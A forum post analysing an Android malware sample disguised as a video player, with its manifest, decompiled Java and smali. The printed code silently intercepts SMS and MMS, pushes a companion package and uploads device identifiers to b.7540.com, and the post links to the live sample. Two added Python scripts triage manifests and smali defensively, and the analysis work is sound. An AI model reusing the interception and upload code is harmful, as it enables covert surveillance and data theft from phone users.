This post was last edited by kangkai on 2014-2-16 23:06
1. Basic sample information
File information:
File Name: avplayer2.apk
File MD5: 750602da49e8b374dd476f37e620e40b
Package: com.extremeplayer.cl
Sample download: http://yunpan.cn/QDhDrB2LbJyyf (access code 58f2)
The malware consists of two parts:
1. The parent installer package: checks whether the malicious child package is installed and, if not, tricks the user into installing it; it also intercepts SMS and MMS messages and uploads device information.
2. The child installer package: has little malicious behaviour of its own, so it is not analysed in detail.
How the parent package works is shown by the code analysis below.
2. Malware code analysis
Looking at the AndroidManifest.xml configuration file, the program can be started through components such as com.uus.mv2.service.MyReceiver and com.uus.mv2.activity.IndexUIActivity. Note that the receiver's SMS_RECEIVED and WAP_PUSH_RECEIVED intent filters are declared with android:priority="2147483647" (Integer.MAX_VALUE): in the ordered broadcast this places the receiver ahead of the stock messaging app, so its abortBroadcast() call in the code below stops the message from ever reaching the user.
The configuration file is as follows:
[XML]
</receiver>
<receiver android:name="com.uus.mv2.service.MyReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
<action android:name="yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED" />
<action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED_2" />
<action android:name="android.provider.Telephony.WAP_PUSH_GSM_RECEIVED" />
<data android:mimeType="application/vnd.wap.mms-message" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</receiver>
<receiver android:name="com.uus.mv2.service.MyReceiver">
<intent-filter android:priority="2147483647">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<activity android:label="@string/app_name" android:name="com.uus.mv2.activity.StartActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.IndexUIActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.DetailActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.OrderActivity" android:screenOrientation="portrait">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<activity android:name="com.uus.mv2.activity.Media_Activity" android:screenOrientation="sensor" android:configChanges="locale|keyboardHidden|orientation">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
</intent-filter>
</activity>
<receiver android:name="MyReceiver">
<intent-filter>
<action android:name="android.intent.action.PACKAGE_ADDED" />
<data android:scheme="package" />
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.USER_PRESENT" />
</intent-filter>
</receiver>
<meta-data android:name="NOICON_CHANNEL" android:value="25" />
<meta-data android:name="UMENG_APPKEY" android:value="52b0271e56240b55790437ac" />
<meta-data android:name="UMENG_CHANNEL" android:value="app75401107" />
</application>
</manifest>
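As an added example (not code from the original post or from the sample), the following Python script turns the manifest observations above into a repeatable static triage check: it flags receivers that hook SMS or WAP-push broadcasts, rates them high when registered at Integer.MAX_VALUE priority, notes a PACKAGE_ADDED watcher, and counts activities answering action.MAIN. The embedded manifest is a constructed, well-formed wrapper around the receiver and activity fragments quoted above; the action lists, severity levels and verdict thresholds are my own heuristics, not part of the post.

```python
"""Static triage of an AndroidManifest.xml for the SMS/MMS-interception pattern
described above: telephony receivers registered at Integer.MAX_VALUE priority
(so they run before the stock messaging app and can call abortBroadcast), a
PACKAGE_ADDED watcher, and several activities answering action.MAIN."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_PRIORITY = "{%s}priority" % ANDROID_NS

# Broadcasts delivered for incoming SMS / WAP-push (MMS notification) on stock,
# dual-SIM and OEM (yulong.*) firmwares; a media player has no reason to receive them.
SMS_ACTIONS = {
    "android.provider.Telephony.SMS_RECEIVED",
    "android.provider.Telephony.SMS_RECEIVED_2",
    "android.provider.Telephony.GSM_SMS_RECEIVED",
    "android.intent.action.DATA_SMS_RECEIVED",
}
WAP_ACTIONS = {
    "android.provider.Telephony.WAP_PUSH_RECEIVED",
    "android.provider.Telephony.WAP_PUSH_RECEIVED_2",
    "android.provider.Telephony.WAP_PUSH_GSM_RECEIVED",
    "yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED",
}
MAX_PRIORITY = 2147483647  # Integer.MAX_VALUE

# Constructed sample: the receiver/activity fragments from the post, wrapped in a
# minimal <manifest>/<application> so the parser gets a well-formed document.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.extremeplayer.cl">
  <application>
    <receiver android:name="com.uus.mv2.service.MyReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />
        <action android:name="yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED" />
        <data android:mimeType="application/vnd.wap.mms-message" />
      </intent-filter>
    </receiver>
    <receiver android:name="com.uus.mv2.service.MyReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
      </intent-filter>
    </receiver>
    <activity android:name="com.uus.mv2.activity.StartActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name="com.uus.mv2.activity.IndexUIActivity">
      <intent-filter><action android:name="android.intent.action.MAIN" /></intent-filter>
    </activity>
    <receiver android:name="MyReceiver">
      <intent-filter>
        <action android:name="android.intent.action.PACKAGE_ADDED" />
        <data android:scheme="package" />
      </intent-filter>
      <intent-filter><action android:name="android.intent.action.USER_PRESENT" /></intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _priority(flt):
    """Parse android:priority; non-numeric values (resource references) count as 0."""
    try:
        return int(flt.get(A_PRIORITY, "0"))
    except ValueError:
        return 0


def triage_manifest(xml_text):
    """Return a list of findings, each {'severity', 'component', 'detail'}."""
    root = ET.fromstring(xml_text)
    findings = []
    for receiver in root.iter("receiver"):
        name = receiver.get(A_NAME)
        for flt in receiver.findall("intent-filter"):
            actions = {a.get(A_NAME) for a in flt.findall("action")}
            prio = _priority(flt)
            hooked = actions & (SMS_ACTIONS | WAP_ACTIONS)
            if hooked:
                kind = "SMS" if actions & SMS_ACTIONS else "WAP-push/MMS"
                findings.append({
                    "severity": "high" if prio >= MAX_PRIORITY else "medium",
                    "component": name,
                    "detail": "%s receiver at priority %d: %s" % (kind, prio, ", ".join(sorted(hooked))),
                })
            if "android.intent.action.PACKAGE_ADDED" in actions:
                findings.append({"severity": "medium", "component": name,
                                 "detail": "watches PACKAGE_ADDED (companion-package install check)"})
    main_activities = [
        act.get(A_NAME) for act in root.iter("activity")
        if any(a.get(A_NAME) == "android.intent.action.MAIN"
               for flt in act.findall("intent-filter") for a in flt.findall("action"))
    ]
    if len(main_activities) > 1:
        findings.append({"severity": "low", "component": ", ".join(main_activities),
                         "detail": "%d activities declare action.MAIN" % len(main_activities)})
    return findings


def verdict(findings):
    """'suspicious' on any high finding, 'review' on lower ones, else 'clean'."""
    sev = {f["severity"] for f in findings}
    if "high" in sev:
        return "suspicious"
    return "review" if sev else "clean"


if __name__ == "__main__":
    fs = triage_manifest(SAMPLE_MANIFEST)
    for f in fs:
        print("[%s] %s: %s" % (f["severity"], f["component"], f["detail"]))
    print("verdict:", verdict(fs))
```

On the constructed manifest this reports two high findings (the WAP-push and SMS receivers at maximum priority), one medium (the PACKAGE_ADDED watcher) and one low (two activities declaring action.MAIN), giving a "suspicious" verdict. The priority rule is the important one: an SMS receiver at normal priority is common in legitimate apps, while one at Integer.MAX_VALUE combined with abortBroadcast in the code is the interception pattern.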
Each time the program starts it checks whether the child package is installed; if not, it prompts the user to install it, and keeps doing so until the user installs it.
Source code (decompiled; the decompiler's while(true) idiom has been unfolded into the control flow shown by the smali below):
[Java]
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import com.android.guideadsnoicon.InstallNoIconApk;

public class MyReceiver extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if (paramIntent.getAction().equals("android.intent.action.PACKAGE_ADDED"))
    {
      // the data string is "package:<name>"; substring(8) strips the "package:" prefix
      if (paramIntent.getDataString().substring(8).equals("com.android.zero.noiconads"))
      {
        // child package is now installed: notify the rest of the app
        int i = Build.VERSION.SDK_INT;
        Intent localIntent = new Intent("action.install_finish");
        if (i >= 12)
          localIntent.setFlags(32); // 0x20 = FLAG_INCLUDE_STOPPED_PACKAGES (API 12+)
        paramContext.sendBroadcast(localIntent);
      }
      return;
    }
    if (paramIntent.getAction().equals("android.intent.action.USER_PRESENT"))
      InstallNoIconApk.copySoft(paramContext); // drop and install the child package
  }
}
Smali code:
[Smali]
if-eqz v3, :cond_2
.line 14
invoke-virtual {p2}, Landroid/content/Intent;->getDataString()Ljava/lang/String;
move-result-object v3
const/16 v4, 0x8
invoke-virtual {v3, v4}, Ljava/lang/String;->substring(I)Ljava/lang/String;
move-result-object v2
.line 15
.local v2, packagename:Ljava/lang/String;
const-string v3, "com.android.zero.noiconads"
invoke-virtual {v2, v3}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v3
if-eqz v3, :cond_1
.line 16
sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
.line 17
.local v0, api:I
new-instance v1, Landroid/content/Intent;
const-string v3, "action.install_finish"
invoke-direct {v1, v3}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
.line 18
.local v1, intnetbroad:Landroid/content/Intent;
const/16 v3, 0xc
if-lt v0, v3, :cond_0
.line 19
const/16 v3, 0x20
invoke-virtual {v1, v3}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
.line 21
:cond_0
invoke-virtual {p1, v1}, Landroid/content/Context;->sendBroadcast(Landroid/content/Intent;)V
.line 26
.end local v0 #api:I
.end local v1 #intnetbroad:Landroid/content/Intent;
.end local v2 #packagename:Ljava/lang/String;
:cond_1
:goto_0
return-void
.line 23
:cond_2
invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
move-result-object v3
const-string v4, "android.intent.action.USER_PRESENT"
invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v3
if-eqz v3, :cond_1
.line 24
invoke-static {p1}, Lcom/android/guideadsnoicon/InstallNoIconApk;->copySoft(Landroid/content/Context;)V
goto :goto_0
.end method
Collects device information and uploads it to b.7540.com.
Source code (fragment):
[Java]
public void run()
{
HttpGet localHttpGet = new HttpGet(http://b.7540.com/app/channel_ispop.do?channelId= // uploads to b.7540.com
Smali code:
[Smali]
new-instance v9, Ljava/lang/StringBuilder;
const-string v10, "http://b.7540.com/app/channel_ispop.do?channelId="
invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
Monitors incoming SMS, MMS and WAP-push messages.
Source code (decompiled; the decompiler's while(true)/continue idiom has been unfolded into the equivalent straight-line control flow):
[Java]
// com.uus.mv2.service.MyReceiver. The logger field this.a and the helper classes
// h, c, a and com.uus.mv2.controller.d are obfuscated and keep the decompiler's
// names. Integer arguments to getString() are string-resource ids (res/values)
// that the post does not resolve.
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.res.Resources;
import android.os.Build;
import android.os.Bundle;
import android.telephony.SmsMessage;

public class MyReceiver extends BroadcastReceiver
{
  // SMS path: swallow messages from a configured sender whose body matches two keyword groups
  private void a(Context paramContext, Intent paramIntent)
  {
    Bundle localBundle = paramIntent.getExtras();
    this.a.d("::::::bundle = " + localBundle.toString());
    if (localBundle.containsKey("pdus"))
    {
      Resources r = paramContext.getResources();
      Object[] arrayOfObject = (Object[])localBundle.get("pdus");
      SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
      for (int i = 0; i < arrayOfObject.length; i++)
      {
        arrayOfSmsMessage[i] = SmsMessage.createFromPdu((byte[])arrayOfObject[i]);
        this.a.d("::::::smsMessage = " + arrayOfSmsMessage[i].getOriginatingAddress() + ";;; " + arrayOfSmsMessage[i].getMessageBody() + ";;; " + arrayOfSmsMessage[i].getIndexOnIcc());
        // sender must contain the number stored in string resource 2131362053
        if (arrayOfSmsMessage[i].getOriginatingAddress().contains(r.getString(2131362053)))
        {
          String str = arrayOfSmsMessage[i].getMessageBody();
          // body must contain at least one keyword from each of two resource-string groups
          boolean groupA = str.contains(r.getString(2131362042)) || str.contains(r.getString(2131362043)) || str.contains(r.getString(2131362044)) || str.contains(r.getString(2131362049)) || str.contains(r.getString(2131362054)) || str.contains(r.getString(2131362055)) || str.contains(r.getString(2131362046)) || str.contains(r.getString(2131362047)) || str.contains(r.getString(2131362059));
          boolean groupB = str.contains(r.getString(2131362050)) || str.contains(r.getString(2131362058)) || str.contains(r.getString(2131362051)) || str.contains(r.getString(2131362052)) || str.contains(r.getString(2131362056)) || str.contains(r.getString(2131362045));
          if (groupA && groupB)
            abortBroadcast(); // the SMS never reaches the messaging app or the user
        }
      }
    }
  }

  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if (paramIntent == null)
      return;
    String action = paramIntent.getAction();
    this.a.d(":::::::MyReceiver:::onReceive : " + action);
    if (action.equals("android.intent.action.BOOT_COMPLETED"))
    {
      this.a.d("::::::::::::ACTION_BOOT_COMPLETED");
      paramContext.startService(new Intent(paramContext, MyIntentService.class));
    }
    // monitor WAP-push / MMS notification broadcasts
    if ("yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED".equals(action) || "android.provider.Telephony.WAP_PUSH_RECEIVED_2".equals(action) || "android.provider.Telephony.WAP_PUSH_GSM_RECEIVED".equals(action) || "android.provider.Telephony.WAP_PUSH_RECEIVED".equals(action))
    {
      String str1 = paramIntent.getType();
      if ("application/vnd.wap.sic".equals(str1) || "application/vnd.wap.slc".equals(str1) || "application/vnd.wap.coc".equals(str1) || "application/vnd.wap.mms-message".equals(str1))
      {
        byte[] arrayOfByte = paramIntent.getByteArrayExtra("data");
        if (arrayOfByte != null && arrayOfByte.length > 0)
        {
          try
          {
            Resources r = paramContext.getResources();
            String str2 = new String(arrayOfByte, "UTF-8");
            this.a.d(":::::ByteArrayExtra = " + str2);
            if (str2.contains(r.getString(2131362057)) && (str2.contains(r.getString(2131362044)) || str2.contains(r.getString(2131362045)) || str2.contains(r.getString(2131362046)) || str2.contains(r.getString(2131362047)) || str2.contains(r.getString(2131362048)) || str2.contains(r.getString(2131362059))))
            {
              abortBroadcast(); // suppress the push notification
              // report channel/device identifiers to the control server (d.g holds the host)
              String str3 = h.c("CD=" + com.uus.mv2.controller.d.e + "&CC=" + com.uus.mv2.controller.d.f + "&CV=" + com.uus.mv2.controller.d.h + "&UA=" + com.uus.mv2.controller.d.O + "&CP=" + com.uus.mv2.controller.d.d + "&SK=" + Build.VERSION.SDK_INT);
              String str4 = com.uus.mv2.controller.d.g + "/t.jsp?O=" + str3;
              this.a.d("::::::::::::::::::::::::::control url = " + str4);
              c localc = new c(0, 25, str4, 3);
              localc.a(null);
              localc.d = false;
              a.a().a(localc);
            }
          }
          catch (Exception localException)
          {
            localException.printStackTrace();
          }
        }
      }
    }
    // monitor incoming SMS (stock, dual-SIM and OEM-specific broadcasts)
    if (action.equals("android.intent.action.DATA_SMS_RECEIVED") || "android.provider.Telephony.SMS_RECEIVED".equals(action) || "android.provider.Telephony.SMS_RECEIVED_2".equals(action) || "android.provider.Telephony.GSM_SMS_RECEIVED".equals(action) || "android.provider.Telephony.LMS_FIRST_DISPLAY_TIMEOUT_CTC".equals(action))
      a(paramContext, paramIntent);
  }
}
Smali code:
[Smali]
new-instance v4, Ljava/lang/StringBuilder;
const-string v5, "::::::smsMessage = "
invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
const-string v0, "yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED"
invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
const-string v3, "::::::::::::::::::::::::::control url = "
invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;
// too much to include; not copied in full
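As an added example (not code from the original post or from the sample), the following Python script shows how an analyst working only from apktool's smali output, as in the fragments above and in the b.7540.com upload routine, can recover indicators without running the sample: const-string literals yield the control-server URL, the hooked telephony broadcasts and the companion package name, and invoke targets show where the broadcast is swallowed or the message body read. The embedded smali is a constructed sample assembled from lines quoted in the post plus one abortBroadcast invoke written to match the decompiled Java; the watch-list of method names and the classification rules are my own.

```python
"""Recover network and telephony indicators from smali disassembly: string
constants give the control-server URL, the broadcast actions hooked and the
companion package name; invoke targets show where the broadcast is aborted
or the SMS contents are read."""
import re
from urllib.parse import urlsplit

CONST_STRING = re.compile(r'const-string(?:/jumbo)?\s+[vp]\d+,\s+"((?:[^"\\]|\\.)*)"')
INVOKE = re.compile(
    r'invoke-(?:virtual|static|direct|interface|super)(?:/range)?\s+\{[^}]*\},\s+(L[\w/$]+;)->(\w+)\(')
URL = re.compile(r'^https?://', re.I)
PACKAGE = re.compile(r'^[a-z]\w*(?:\.[a-z]\w*){2,}$')

# Calls that, inside a receiver hooked to SMS_RECEIVED / WAP_PUSH_RECEIVED, mean
# the message is being read or hidden from the user.
WATCHLIST = {"abortBroadcast", "createFromPdu", "getOriginatingAddress",
             "getMessageBody", "getDataString"}

# Constructed sample: smali lines quoted in the post, plus one abortBroadcast
# invoke written to match the decompiled Java (not taken from the sample itself).
SAMPLE_SMALI = """\
invoke-virtual {p2}, Landroid/content/Intent;->getDataString()Ljava/lang/String;
const-string v3, "com.android.zero.noiconads"
const-string v3, "action.install_finish"
const-string v4, "android.intent.action.USER_PRESENT"
invoke-static {p1}, Lcom/android/guideadsnoicon/InstallNoIconApk;->copySoft(Landroid/content/Context;)V
const-string v10, "http://b.7540.com/app/channel_ispop.do?channelId="
const-string v0, "yulong.provider.Telephony.DUAL_WAP_PUSH_RECEIVED"
invoke-virtual {p0}, Lcom/uus/mv2/service/MyReceiver;->abortBroadcast()V
"""


def extract_indicators(smali):
    """Classify every string constant and flag watch-listed method invocations."""
    ind = {"urls": [], "telephony_actions": [], "intent_actions": [],
           "package_refs": [], "sensitive_calls": []}
    for m in CONST_STRING.finditer(smali):
        s = m.group(1)
        if URL.match(s):
            ind["urls"].append(s)
        elif ".Telephony." in s:
            ind["telephony_actions"].append(s)
        elif ".intent.action." in s or s.startswith("action."):
            ind["intent_actions"].append(s)
        elif PACKAGE.match(s):
            ind["package_refs"].append(s)
    for cls, meth in INVOKE.findall(smali):
        if meth in WATCHLIST:
            ind["sensitive_calls"].append(cls + "->" + meth)
    return ind


def hosts(indicators):
    """Distinct network hosts in order of first appearance, for blocklists or DNS hunting."""
    seen = []
    for u in indicators["urls"]:
        h = urlsplit(u).hostname
        if h and h not in seen:
            seen.append(h)
    return seen


if __name__ == "__main__":
    ind = extract_indicators(SAMPLE_SMALI)
    for key, values in ind.items():
        print("%-18s %s" % (key + ":", ", ".join(values) or "-"))
    print("hosts:", hosts(ind))
```

Run over the whole smali tree (one file per class) the same scan gives a quick map of which classes touch telephony broadcasts and which carry network endpoints; a class that contains both a hooked telephony action and abortBroadcast is the one to read first.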
The child package shows no malicious behaviour of its own, so it is not analysed in detail.
3. Malicious behaviour
Collects and uploads basic device information, installs an application, and intercepts SMS and MMS messages.
Since Android is an extremely open system, the convenience it brings comes with considerable security risk. We therefore recommend downloading Android apps only from major, reputable app stores such as 360 Mobile Assistant or Tencent's Yingyongbao, to reduce the chance of Android malware getting onto our phones.
// We analysed this virus's code before the New Year; having recently studied some smali, I have added an analysis of the smali code. Please forgive any mistakes.
@willJ @Hmily, should a dedicated section for mobile malware analysis be opened, separating PC malware from mobile malware?